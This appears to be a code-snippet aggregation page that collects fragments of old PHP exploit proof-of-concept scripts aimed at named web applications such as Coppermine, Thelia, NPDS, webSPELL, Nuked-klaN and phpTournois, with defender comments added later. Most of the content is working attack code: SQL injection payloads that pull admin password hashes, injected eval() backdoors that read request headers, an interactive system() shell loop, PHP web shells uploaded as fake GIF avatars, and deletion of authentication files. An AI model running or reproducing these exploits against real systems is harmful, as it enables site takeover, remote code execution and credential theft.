예제 #1
/**
 * Interactive loop of this exploit PoC: relays shell commands to the target
 * through the `fields` parameter of index.php and prints whatever the target
 * echoes back between two copies of a random separator.
 *
 * Depends on helpers defined elsewhere in the file (not visible here):
 * head(), get_p(), cmd_prompt(), add_slashes(), to_char(), and the
 * phpsploit HTTP client class.
 *
 * Defender notes: the traffic is distinctive — a non-standard `MypCode`
 * request header carrying base64 text, and a `fields` query value that is an
 * encoded string rather than a column name. The author's comments say the
 * value lands in an SQL statement; a parameterised query removes that entry
 * point, and an eval() fed from $_SERVER request headers is the second half
 * of the chain. How the PHP fragment is made to execute on the target is not
 * visible in this excerpt.
 *
 * @return void  Exits with status 1 when a response lacks the separator.
 */
function main()
{
    // :)  -- HTTP client used for every request below
    $web = new phpsploit();
    // presumably the User-Agent string (phpsploit internals not visible here)
    $web->agent('Mozilla Firefox');
    // Hey ya :)  -- head() is defined elsewhere; presumably prints a banner
    head();
    // Target -- second argument presumably marks the option as required
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass -- per the author, closes the quoted value the payload is inserted into
    $byp = "1');";
    // PHP code -- the fragment the target is expected to run: it eval()s the
    // base64-decoded `MypCode` request header that is set on each loop iteration below
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator -- random marker printed before and after the command output so
    // it can be cut out of the surrounding page; it is only a delimiter
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code -- `exit();//` stops the page and comments out whatever follows
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess ! -- cmd_prompt() (defined elsewhere) returns false to end the loop
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass -- per the author, carrying the command in a
        // request header keeps it out of the quoted GET/POST/cookie data
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =] -- to_char() (defined elsewhere) presumably encodes $final so it needs no quotes
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result -- $res[1] is the text between the two separator copies
        $res = explode($s_sep, $web->getcontent());
        // Erf -- no separator in the response: the injected code did not run
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
예제 #2
    print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
    print "\nExample.......: php xpl.php http://c.com/ admin passwd";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
/*/
 [0] => xpl.php         [1] => http://localhost/cpg1410/
 [2] => root            [3] => toor
 [4] => localhost:8200  [5] => user:passwd
/*/
// Positional arguments, as laid out in the $argv dump above:
// [1] base URL of the target, [2]/[3] admin login and password,
// [4] optional proxy host:port, [5] optional proxy user:password.
// Nothing in this excerpt guards against a missing [4]/[5]; unless
// error_reporting was adjusted earlier in the file, PHP emits a notice.
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
// HTTP client (phpsploit class, defined elsewhere). The method names suggest
// a User-Agent string, a cookie jar and automatic redirect following, but the
// implementation is not visible here.
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
// Banner
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
// Optional proxy and basic proxy authentication; empty() treats "" and "0" as absent
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/
예제 #3
#!/usr/bin/php
<?php 
// Usage banner; exits when fewer than two positional arguments were given
// (the proxy arguments [3] and [4] are optional).
if ($argc < 3) {
    print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n";
    exit(1);
}
// Positional arguments
$url = $argv[1];    // target base URL
$file = $argv[2];   // server-side file the PoC tries to read (per the usage text)
$proxh = $argv[3];  // optional proxy host:port; reading a missing index emits a notice
$proxa = $argv[4];  // optional proxy user:pass
// HTTP client (phpsploit class, defined elsewhere); agent() presumably sets the User-Agent
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// Truthiness test: an empty-string argument counts as "no proxy"
if ($proxh) {
    $xpl->proxy($proxh);
}
if ($proxa) {
    $xpl->proxyauth($proxa);
}
/*
 * $id = $_GET['id'];
 * $query = "SELECT * from content WHERE id = $id";
 * ...
 * @return $row->text;
 *
 * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
 * What we want is not in the database, it's in a file (config.php):
 *
 * //this are the logins for the admin part. Change them for security.
 * $login = "******";  //your login for the admin section.
 * $pass = "******";   //your login for the admin section.
 *
예제 #4
파일: 6006.php 프로젝트: iusky/fullypwnd
# http://www.thelia.fr/
# THELIA est un logiciel évolutif de Commerce Electronique. THELIA se distingue des applications concurrentes par sa facilité de personnalisation.
# A new version (1.3.6.1)  is avaible on www.thelia.fr/fichiers/thelia_1.3.6.1.zip
#
# Black_H :)
#
# Hide E_NOTICE so that absent getparam() options / $argv indexes stay silent
error_reporting(E_ALL ^ E_NOTICE);
# Usage banner; the text is one double-quoted string with the literal `$` escaped
if ($argc < 3) {
    echo "\n=___________ Thelia 1.3.5 Multiple Vulnerability Exploit  _____________=\n========================================================================\n|                  Black_H <*****@*****.**>                         |\n|          URL: http://blackh.free.fr - http://blackh.eu               |\n========================================================================\n| \$system> {$argv['0']} -url <> -a <1,2,3> -n <> -f <>                   |\n| Notes: -url       ex: http://victim.com/site/                        |\n|         -a        1 : Validate Command without Payment               |\n|                           -n Commmand number (ex: CDE5627JOC )       |\n|                   2 : Remote Code Execution                          |\n|                           -n Rubrique id  (ex: 1 )                   |\n|                   3 : Remote File Upload                             |\n|                           -n Rubrique id  (ex: 1 )                   |\n|                           -f Name of file (ex: leet.php )            |\n| For 2 and 3, the '/client/' directory  must not be forbidden         |\n========================================================================\n";
    exit(1);
}
# Options (getparam() is defined elsewhere; the second argument presumably marks the option as required)
$url = getparam('url', 1);
$action = getparam('a', 1);   # '1', '2' or '3' (see the banner)
$n = getparam('n', 1);        # command number or "rubrique" id, depending on the action
$f = getparam('f', 0);        # file name; only meaningful for action 3
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
# Dispatch on the -a option to handlers defined elsewhere in the file.
# switch compares loosely (==), so an integer 1 would also match case '1'.
switch ($action) {
    case '1':
        valid_command($n);
        break;
    case '2':
        remote_exec($n);
        break;
    case '3':
        remote_upload($n, $f);
        break;
    default:
        die('Please choose an action.');
        break;   # unreachable after die()
}
예제 #5
#!/usr/bin/php
<?php 
// Hide E_NOTICE so absent options and undefined indexes stay silent
error_reporting(E_ALL ^ E_NOTICE);
// head() and usage() are defined elsewhere; presumably banner and usage text
head();
if ($argc < 3) {
    usage();
}
// Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
// PHP fragment the PoC tries to get written into config.inc.php (it is spliced
// into $minimdata below): it eval()s the `Shell` request header, i.e. code
// chosen by whoever sends the request.
// Defender note: a settings writer that interpolates request values into a
// .php file without quoting/validation is the underlying flaw; persist
// settings as data (JSON, DB rows), never as executable PHP.
$cod = 'eval($_SERVER[HTTP_SHELL]);';
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
// Per the progress messages: a `suppr=1` POST removes the credential file,
// the next POST recreates it with a chosen login/password, and the third
// POST logs in with it. None of these requests carries a prior session.
// Defender note: deleting or recreating auth.inc.php must require an
// authenticated admin session and a CSRF token.
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
// Every setting is set to a harmless value; DEBUG carries `0;` + the
// url-encoded $cod + `//`, so that if the target writes the value unquoted
// into config.inc.php the fragment becomes a statement of its own.
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
예제 #6
 --------------------------
 |
 +-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums")

 ---[ CODE ./index/common_actions.php
 ------------------------------------
 $file = $_FILES['upload']['tmp_name']; ...
 if(@copy($file,$path_file)) $avatar=$path_file;
 ------------------------------------
 |
 +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
// Positional arguments: target base URL, optional proxy host:port, optional proxy user:pass
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
// HTTP client (phpsploit class, defined elsewhere); no agent() call here
$xpl = new phpsploit();
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
// Requests forum.php with an always-true `fid` value and scrapes the owner
// name out of an href in the response. Here get()'s return value is passed to
// getcontent(); other scripts on this page call getcontent() with no argument,
// so the phpsploit signature cannot be pinned down from this excerpt.
// Defender note: the `-1 or 1=1` shape suggests `fid` is interpolated into
// SQL; an int cast or a prepared statement closes that.
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    die("\nsploit> Exploit failed");
}
// Kept for the later steps of the file (not visible here)
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
예제 #7
#!/usr/bin/php
<?php 
# Hide E_NOTICE so absent options stay silent
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
# Usage; -url is required
if ($argc < 3) {
    print "\n  TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n   NOTE | Works regardless of php settings\n  USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy     If you wanna use a proxy <proxyhost:proxyport> \n        | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', 1);
$pro = getparam('proxy');
# NOTE(review): reads 'proyauth', while the usage text documents -proxyauth;
# as written the documented option is never picked up.
$pra = getparam('proyauth');
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125.  settype ($lid, "integer");
# 126.  PrintPage("links",$DB, $lid);
#
# 30.  if ($oper=="links") {
# 31.  $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32.  list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40.  if ($DB) {
# 41.  $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
예제 #8
<?php

//webSPELL SQL-injection exploit in gallery.php
// Shared HTTP client (phpsploit class, defined elsewhere); redirect following
// and the cookie jar are switched on before it is handed to istrue() below.
$xpl = new phpsploit();
$xpl->allowredirection(1);
$xpl->cookiejar(1);
/**
 * Boolean oracle for one character of a blind SQL injection.
 *
 * Issues one GET to gallery.php whose picID value has an AND condition
 * appended that compares the $i-th character of the selected password column
 * with CHAR($h), then reports whether the response still carries the
 * "webSPELL Diashow" title.
 *
 * @param object $xpl    phpsploit HTTP client (class defined elsewhere)
 * @param string $host   target host name
 * @param string $path   path prefix, prepended to gallery.php
 * @param string $prefix table-name prefix of the target installation
 * @param string $gid    galleryID query value
 * @param string $pid    picID query value the condition is appended to
 * @param string $uid    userID row to read from
 * @param int    $i      1-based character position handed to MID()
 * @param int    $h      ASCII code compared via CHAR()
 * @return bool          true when the title regex matches the response
 *
 * Defender notes: the oracle is the page title, so many near-identical
 * gallery.php requests differing only in the MID()/CHAR() values are the
 * signature to alert on. Casting picID/galleryID to int (or a prepared
 * statement) removes the injection; password_hash() storage limits what a
 * successful read yields.
 */
function istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)
{
    // %20 keeps the condition inside the picID query value
    $xpl->get("http://" . $host . $path . "gallery.php?action=window&galleryID=" . $gid . "&picID=" . $pid . "%20AND%20MID((SELECT%20password%20FROM%20" . $prefix . "user%20WHERE%20userID=" . $uid . ")," . $i . ",1)=CHAR(" . $h . ")");
    $response = $xpl->getcontent();
    // Presumably the title is only rendered when the picture row was found,
    // i.e. when the appended condition held
    $regex = '/<html><head><title>webSPELL Diashow: (.+?)<\\/title>/';
    if (preg_match($regex, $response)) {
        return true;
    } else {
        return false;
    }
}
if ($_SERVER['argc'] == 7 or $_SERVER['argc'] == 8) {
    $host = $_SERVER['argv'][1];
    $path = $_SERVER['argv'][2];
    $prefix = $_SERVER['argv'][3];
    $gid = $_SERVER['argv'][4];
    $pid = $_SERVER['argv'][5];
    $uid = $_SERVER['argv'][6];
    if ($_SERVER['argc'] == 8) {
        $proxy = $_SERVER['argv'][7];
        echo "Proxy: {$proxy} \n";
        $xpl->proxy($proxy);
    }
    $xpl->agent('Internet Explorer');
    echo "exploiting...\n";
예제 #9
파일: 5281.php 프로젝트: iusky/fullypwnd
 * Special thanks to: ddx39.
 *
\*---------------------------------------------------------------*/
// Online MD5 lookup services, presumably tried in turn by a helper defined
// elsewhere: each entry is [endpoint, POST-body prefix, capture regex for the
// plaintext]. The '******' inside the fourth entry is a redaction made by the
// hosting site, not original code (as written it is not valid PHP).
// Defender note: such lookups only work against unsalted MD5 hashes;
// password_hash()/password_verify() make them useless.
$md5loc = array(array('http://www.milw0rm.com/cracker/search.php', 'hash=', '<TD align="middle" nowrap="nowrap" width=90>([^<]+)</TD><TD align="middle" nowrap="nowrap" width=90>cracked</TD></TR>'), array('http://gdataonline.com/qkhash.php?mode=txt&hash=', '', '</td><td width="35%"><b>([^<]+)</b></td></tr>'), array('http://pepowned.free.fr/?act=&x=52&y=16&md5=', '', 'Le Plain Text de <b>\\w{32}</b> est : <b>([^<]+)</b>'), array('http://passcracking.ru/index.php', 'admin=false&admin2=77.php&datafromuser='******'<td>\\w{32}</td><td bgcolor=\\#FF0000>([^<]+)</td><td>'), array('http://md5.rednoize.com/?p&s=md5&_=&q=', '', '<div id="result">([^<]+)</div>'), array('http://ice.breaker.free.fr/md5.php?hash=', '', '<b><br><br> - ([^<]+)<br><br><br><a href=http://ice\\.breaker\\.free\\.fr/'));
print "\n";
print "   PEEL CMS Admin Hash Extraction and Remote Upload\n";
print "       by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
// Usage; exits (status 0) when no URL was given
if ($argc < 2) {
    print "usage: php peel_exploit.php <url> [options]\n\n";
    print "Options:\n";
    print " -admin <login:pass>\tIf you have admin access, you can use this.\n";
    print "\nexample: php peel_exploit.php http://site.org/boutique/ -admin admin:passw0rd\n";
    exit;
}
$url = $argv[1];
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
// Optional -admin login:pass (getparam() defined elsewhere); branches below
$admin = getparam("admin");
if ($admin) {
    print "[*] Using admin login {$admin}\n";
    list($login, $r) = explode(":", $admin);
    attack($login, $r);
    print "\n";
} else {
    /* --- ATTACK #1: LOGIN GUESSING --- */
    print "[*] Attack #1\n";
    $default = array(array("*****@*****.**", "admin"), array("*****@*****.**", "cinema"));
    for ($i = 0; $i < sizeof($default); $i++) {
        print "[*] Trying with " . $default[$i][0] . ":" . $default[$i][1];
        if (attack($default[$i][0], $default[$i][1]) == 1) {
            exit;
예제 #10
    print "\nType..........: PHP Code Execution";
    print "\nRisk.level....: High";
    print "\nSrc.download..: www.alexphpteam.com";
    print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
    print "\nCredits.......: DarkFig";
    print "\n---------------------------------------------------------";
    print "\nUsage.........: php xpl.php <url>";
    print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
    print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
// Positional arguments: target base URL, optional proxy host:port, optional proxy user:pass
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
// HTTP client (phpsploit class, defined elsewhere); agent() presumably sets the User-Agent
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
// empty() treats "" and "0" as "no proxy"
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
/*/
 |
 | index.php
 | =========
 | ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
 |
 |
 | livre_include.php -> Local File Inclusion
예제 #11
    print "          -file    If you wanna upload a specific file\n";
    print "                   else it will upload a simple uploader.\n";
    print "\n";
    print " eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd\n";
    print " eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118\n\n";
    die;
}
// Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam("url", 1);
// getparam() is evaluated twice for each defaulted option; a value of "" or
// "0" falls back to the default because of the truthiness test
$mode = getparam("mode") ? getparam("mode") : 0;
$adm = getparam("admin");   // admin login:pass
$acc = getparam("user");    // read here, used later in the file (not visible)
$prx = getparam("proxy");
$prefix = getparam("prefix") ? getparam("prefix") : "nuked_";   // table prefix
// Content to upload: the file named by -file, else a minimal PHP upload form
// (see the usage text above). A false from file_get_contents() on a missing
// file is not checked here.
$file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>';
// [year, month, day] of the local date; presumably used later to build a path
$date = array(date('Y'), date('m'), date('d'));
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
/* Admin account defined */
if ($adm) {
    print "[*] Using admin account {$adm}\n";
    list($login, $passwd) = explode(":", $adm);
    $xpl->addheader("Referer", $url);
    $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
    if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
        $admin_sid = $sid[1];
        $admin_uid = $uid[1];
        print "      SID -> {$admin_sid}\n";
        print "      UID -> {$admin_uid}\n";
        finalattack($admin_sid, $admin_uid);
예제 #12
<?php

/*
Title:          Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
// Hide E_NOTICE (e.g. when the regexes below capture nothing)
error_reporting(E_ALL ^ E_NOTICE);
// Hard-coded target; edit before running
$url = 'http://localhost/jupiter/';
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// UNION-based injection carried in the Client-IP request header: the selected
// username/password are wrapped in marker strings so they can be picked out of
// the response with the regexes below.
// Defender note: Client-IP / X-Forwarded-For are client-supplied; validate
// them with filter_var(..., FILTER_VALIDATE_IP) and bind them as parameters
// before any query or log write.
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP", $hev);
$xpl->get($url);
// Extract the marked values; the second regex expects a 32-hex-char (MD5-shaped) hash
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
// With E_NOTICE hidden, a missing capture prints as an empty string
print $usr[1] . '::' . $pwd[1];
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
예제 #13
     * @example $this->reset()
     * 
     */
    function reset($func = '')
    {
        // 'header' / 'cookie' clear only that list; anything else (including
        // the default '') also drops the cookie jar and the redirect setting.
        // switch compares loosely (==), so only these two strings match.
        switch ($func) {
            case 'header':
                $this->header = array();
                break;
            case 'cookie':
                $this->cookie = array();
                break;
            default:
                // Presumably the values the properties start with (the
                // constructor is not visible here): '' for the scalar settings,
                // empty arrays for the header and cookie lists.
                $this->cookiejar = '';
                $this->header = array();
                $this->cookie = array();
                $this->allowredirection = '';
                break;
        }
    }
}
// Script body: build the HTTP client, hand it to the ipb_spl helper (defined
// elsewhere) and run it.
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
// PHP4-era reference assignment; since PHP 5 objects are handles, so a plain
// `=` would share the same instance just as well
$ipb->web =& $web;
$ipb->main();
?>

# milw0rm.com [2008-08-29]
예제 #14
<?php

#
#  Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <*****@*****.**>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
# Hide E_NOTICE
error_reporting(E_ALL ^ E_NOTICE);
# This file requires the PhpSploit class (defined elsewhere).
$xpl = new phpsploit();
# Hard-coded settings; edit before running
$url = 'http://localhost/nk/';
# url
$prx = '';
# proxy <proxyip>:<proxyport>
$pra = '';
# basic proxy authentication <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
# Empty string = no proxy
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# Target settings collected as a list; index 0 is the table prefix
$config = array();
$config[] = 'nuked';
# table prefix
예제 #15
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
# Usage; -url and -file are both required, so fewer than four argv entries means exit
if ($argc < 5) {
    print "\n------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------\n-----------------------------------------------------------------------\nPHP conditions: register_globals=On\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> -file <> [Options]\n Params: -url       For example http://victim.com/webspell/ \n         -file      The file you wanna upload (c99shell.php...)\nOptions: -prefix    Table prefix (default=webs)\n         -upmatch   The match which returns TRUE for the upload\n         -sqlmatch  The match which returns TRUE for the SQL injection\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/webspell/ -file c99shell.php\n-----------------------------------------------------------------------\n";
    exit(1);
}
# Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam('url', 1);
$file = getparam('file', 1);
# Defaults; getparam() is evaluated twice for each defaulted option
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
# Regex fragments (already escaped for use inside a pattern) that mark success
# for the upload and for the SQL injection; blind() below presumably uses the latter
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
# HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
# blind() is defined elsewhere; judging by its arguments it reads one column of
# the admin row through a blind SQL injection
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
# The ws_auth cookie is built as "<userid>:<password hash>" (%3A is an encoded
# ':'), so the hash alone is enough to be treated as logged in.
# Defender note: a session cookie derived from the stored password hash is a
# replayable credential; issue a random server-side session id instead, and
# store passwords with password_hash().
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
예제 #16
 *
 */
print "\n";
print "   phpTournois <= G4 Remote File Upload/Code Execution Exploit\n";
print "    by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
// Usage; -url is required
if ($argc < 3) {
    print "usage: php phptn_exploit.php -url <url> [options]\n\n";
    print " Options: -mode    0 -> Remote Upload (default)\n";
    print "                   1 -> Remote Code Execution\n";
    print "          -proxy   If you want to use a proxy.\n";
    exit;
}
// Options (getparam() defined elsewhere; second argument presumably "required")
$url = getparam("url", 1);
$mode = getparam("mode") ? getparam("mode") : 0;   // 0 = upload, 1 = code execution (per the usage text)
$prx = getparam("proxy");
// HTTP client (phpsploit class, defined elsewhere)
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
// Sent with every request; the cookie name suggests the target reads it as a
// grade/role value, which cannot be verified from this excerpt
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar */
// Mode 0: PHP that, on a request carrying an `Upload` header, writes the upload
// form into w00t.php. Mode 1: PHP that eval()s the `Shell` header. Both then
// include the normal accueil.php so the page looks unchanged.
if ($mode == 0) {
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    // Single quotes inside $file_upload_code are escaped so it survives being
    // embedded in the fputs() string literal
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
// Multipart upload described as an array; frmdt_* are presumably constants of
// the phpsploit class. The declared type is image/gif while the body is PHP.
// Defender note: validate uploads by content (e.g. re-encode images), enforce
// an extension allow-list server-side, and serve the upload directory with
// script execution disabled.
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
